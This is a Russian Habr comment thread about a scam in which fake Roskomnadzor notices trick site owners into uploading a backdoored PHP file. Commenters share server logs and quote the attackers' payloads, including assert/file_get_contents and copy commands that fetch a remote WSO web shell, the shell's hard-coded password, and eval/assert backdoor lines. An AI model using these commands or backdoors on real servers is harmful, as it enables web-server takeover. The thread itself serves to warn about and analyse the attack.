Хабр Курсы для всех
РЕКЛАМА
Практикум, Хекслет, SkyPro, авторские курсы — собрали всех и попросили скидки. Осталось выбрать!
Хабр доступен 24/7 благодаря поддержке друзей
Комментарии 39
Honeypot можно сделать и понять, ради чего они это делают.
>> Путь до файла
Это украинец, русский написал бы «путь к файлу»…
Это украинец, русский написал бы «путь к файлу»…
Та шо те шо другие то так то сяк пишут.
«Шо те и шо другие» может и пишут.
Мне как украинцу, прожившему 10 лет в рф в глаза всеравно бросается. Взаимопроникновение обычно ограничивается приграничными областями, так что всёравно — палево.
И кстати стиль письма, такие вот «суржиковые» оговорки и речевые обороты могут использоваться для дальнейшего поиска и идентификации атакующего. Так что господа хакеры — пользуйтесь спеллчекером.
Мне как украинцу, прожившему 10 лет в рф в глаза всеравно бросается. Взаимопроникновение обычно ограничивается приграничными областями, так что всёравно — палево.
И кстати стиль письма, такие вот «суржиковые» оговорки и речевые обороты могут использоваться для дальнейшего поиска и идентификации атакующего. Так что господа хакеры — пользуйтесь спеллчекером.
yandex.ru:
путь до файла — 43 млн. ответов
путь к файлу — 27 млн. ответов
путь до файла — 43 млн. ответов
путь к файлу — 27 млн. ответов
Откуда это недружелюбность между народами и разные такие намеки, — Вы либо слишком много телевизор смотрите, либо политики из СМИ перечитали. Разницы нет, хоть ты негр будешь, все равно найдутся нечестные люди, кто захочет воспользоваться твоими слабостями… а национальность тут не причем (равно как возраст, пол и вероисповедание и др.).
И услышал казак:
«Ты идешь воевать
за народную власть
со своим же народом!»
Бывший подъесаул (Тальков Игорь)
P.S. Роскомнадозор рассылку ведет с адреса: Роскомнадзор <zapret-info-out@rkn.gov.ru>
P.P.S. Возможный текст письма:
Направляется уведомление о внесении в «Единый реестр доменных имен, указателей страниц сайтов в сети «Интернет» и сетевых адресов, позволяющих идентифицировать сайты в сети «Интернет», содержащие информацию, распространение которой в Российской Федерации запрещено» следующего(их) указателя (указателей) страницы (страниц) сайта в сети «Интернет»: /какая то ссылка/.
В случае непринятия провайдером хостинга и (или) владельцем сайта мер по удалению запрещенной информации и (или) ограничению доступа к сайту в сети «Интернет», будет принято решение о включении в единый реестр сетевого адреса, позволяющего идентифицировать сайт в сети «Интернет», содержащий информацию, распространение которой в Российской Федерации запрещено, а доступ к нему будет ограничен.
Сведения о включении доменных имен, указателей страниц сайтов сети «Интернет» и сетевых адресов доступны круглосуточно в сети «Интернет» по адресу eais.rkn.gov.ru.
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.
И услышал казак:
«Ты идешь воевать
за народную власть
со своим же народом!»
Бывший подъесаул (Тальков Игорь)
P.S. Роскомнадозор рассылку ведет с адреса: Роскомнадзор <zapret-info-out@rkn.gov.ru>
P.P.S. Возможный текст письма:
Направляется уведомление о внесении в «Единый реестр доменных имен, указателей страниц сайтов в сети «Интернет» и сетевых адресов, позволяющих идентифицировать сайты в сети «Интернет», содержащие информацию, распространение которой в Российской Федерации запрещено» следующего(их) указателя (указателей) страницы (страниц) сайта в сети «Интернет»: /какая то ссылка/.
В случае непринятия провайдером хостинга и (или) владельцем сайта мер по удалению запрещенной информации и (или) ограничению доступа к сайту в сети «Интернет», будет принято решение о включении в единый реестр сетевого адреса, позволяющего идентифицировать сайт в сети «Интернет», содержащий информацию, распространение которой в Российской Федерации запрещено, а доступ к нему будет ограничен.
Сведения о включении доменных имен, указателей страниц сайтов сети «Интернет» и сетевых адресов доступны круглосуточно в сети «Интернет» по адресу eais.rkn.gov.ru.
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.
Нужно было разместить этот файл, но код поменять таким образом, чтобы вместо уязвимости он сохранял IP и другие данные злоумышленника. И если он не использует прокси и тд., то можно будет в какой-то степени его сдеанонить и уже с его данными написать заявление.
получил такое письмо сегодня ;-))
про развод понял сразу (ну не дотягивает посещение до 3000 уников) — но подход ребята выбрали оригинальный ;-))
про развод понял сразу (ну не дотягивает посещение до 3000 уников) — но подход ребята выбрали оригинальный ;-))
Письмо не приходило, но еще вчера, на всякий случай, настроил редирект для этого адреса на natribu.org
Сегодня в логах нашел:
Сегодня в логах нашел:
access.log:77.221.130.49 — - [27/Aug/2015:07:50:09 +0300] «GET /reestr/reestr-id128032.php?roskomnadzor=print-439573653*57; HTTP/1.1» 301 184 "-" "-" «77.221.130.49»
access.log:178.132.201.92 — - [27/Aug/2015:08:07:26 +0300] «GET /reestr/reestr-id128032.php?roskomnadzor=print-439573653*57; HTTP/1.1» 301 184 "-" "-" «178.132.201.92»
access.log:5.101.156.31 — - [27/Aug/2015:08:08:09 +0300] «GET /reestr/reestr-id128032.php?roskomnadzor=print-439573653*57; HTTP/1.1» 301 184 "-" "-" «5.101.156.31»
access.log:62.113.86.40 — - [27/Aug/2015:09:02:50 +0300] «GET /reestr/reestr-id128032.php?roskomnadzor=print-439573653*57; HTTP/1.1» 301 184 "-" "-" «62.113.86.40»
access.log:78.108.80.142 — - [27/Aug/2015:09:09:13 +0300] «GET /reestr/reestr-id128032.php?roskomnadzor=print-439573653*57; HTTP/1.1» 301 184 "-" "-" «78.108.80.142»
Нарыть бы хороший эксплоит-пак да отдать. Вдруг сработает.
Хм, интересно. Злоумышленниками предполагается, что сайт сделан на php, и других технологий не существует в природе.
А их можно как-нибудь наказать? Во времена диалапа по этой ссылке выложили бы своп для скачки. Вот что-нибудь в этом роде.
А их можно как-нибудь наказать? Во времена диалапа по этой ссылке выложили бы своп для скачки. Вот что-нибудь в этом роде.
Я уже и забыл о таких способах «казни». Можно ещё из /dev/random читать. :)
Вот что-нибудь в этом роде./dev/urandom отдать, пусть качают :)
Сегодня, я думаю, свопу для скачки только обрадуются. Там можно много данных выудить… :)
> Злоумышленниками предполагается, что сайт сделан на php, и других технологий не существует в природе.
Даже если сайт сделан не на php, компилятор php всё равно включён по умолчанию в большинстве unix-like систем.
Расчёт верный.
Даже если сайт сделан не на php, компилятор php всё равно включён по умолчанию в большинстве unix-like систем.
Расчёт верный.
Добавьте в пост признаки того, что это развод. Мало ли кто получит такое письмо и из поисковика на этот пост придёт, пусть полезная информация будет.
Пытались так развести… вот что удалось узнать (пост на Хабре прочитал после изысканий):
после включения логирования переменной $_REQUEST по адресу uralpolit.ru/reestr/reestr-id128032.php (предупреждение: без проверочного roskomnadzor идет нецензурщина) идет проверочная команда: roskomnadzor=print-439573653*57; причем с разных ip адресов (если интересно могу выложить список). как только было съимитировано исполнение на стороне сервера ;), а имнно отдача результата −25055698221 появились запросы поинтереснее: assert(file_get_contents(«5.9.164.145/~users700/ac/u/1.txt»)); по указанному адресу еще обертка с контентом file_put_contents('2.php', file_get_contents('http://5.9.164.145/~users700/ac/u/2.txt')); Ну а зхдесь уже сам шелл ;) 5.9.164.145/~users700/ac/u/2.txt
p.s. буду очень благодарен за инвайт на хабр
после включения логирования переменной $_REQUEST по адресу uralpolit.ru/reestr/reestr-id128032.php (предупреждение: без проверочного roskomnadzor идет нецензурщина) идет проверочная команда: roskomnadzor=print-439573653*57; причем с разных ip адресов (если интересно могу выложить список). как только было съимитировано исполнение на стороне сервера ;), а имнно отдача результата −25055698221 появились запросы поинтереснее: assert(file_get_contents(«5.9.164.145/~users700/ac/u/1.txt»)); по указанному адресу еще обертка с контентом file_put_contents('2.php', file_get_contents('http://5.9.164.145/~users700/ac/u/2.txt')); Ну а зхдесь уже сам шелл ;) 5.9.164.145/~users700/ac/u/2.txt
p.s. буду очень благодарен за инвайт на хабр
Если расшифровать код по ссылке, то за парой реплейсов и декодом код дальше не обфусцирован, беглый осмотр говорит о сборе системной инфы — какие модули БД стоят, сколько есть места на диске и прочее подобное
Внутри файла используется авторизация по паролю (md5 пароля захардкожен), пароль до md5 — «functionderty»
это именно шелл… например в теле функции есть исполнение переменной, полученной из POST:
ну и если исполнить там куча формочек в том числе и для сбора инфы и выполнения различных действий на сервере
function actionPhp() {
//...
eval($_POST['p1']);
//...
}
ну и если исполнить там куча формочек в том числе и для сбора инфы и выполнения различных действий на сервере
ps это известный шелл wso версии 2.5 (в коде define('WSO_VERSION', '2.5');)
У меня вот в что в лог попало:
{«request»:{«roskomnadzor»:«copy('http://ewgames.gq/123.txt','/var/www/1123.php');»}
с 79.105.98.88
{«request»:{«roskomnadzor»:«copy('http://ewgames.gq/123.txt','/var/www/1123.php');»}
с 79.105.98.88
FAIL. Ведь всем же известно, что роскомнадзор не присылает уведомлений.
Когда увидел КПДВ, захотелось написать статью для бложека, сочетающую все «плюсы» с диаграммы.
Вот такое аналогичное было типа от REG.RU в январе:
картинка
мне только что пришло похожее, только якобы от RU-CENTER, support@nic.tech, с требованием подтвердить управление доменом.
Письмо написано и оформлено весьма грамотно, чуть не повелся.
Сделать предлагают аналогичное, только код в пхп чуть отличается
assert(stripslashes($_REQUEST[BWSV3I]));
Письмо написано и оформлено весьма грамотно, чуть не повелся.
Сделать предлагают аналогичное, только код в пхп чуть отличается
assert(stripslashes($_REQUEST[BWSV3I]));
2021, разводка до сих пор применяется.
Зарегистрируйтесь на Хабре, чтобы оставить комментарий
Необычный развод под видом Роскомнадзора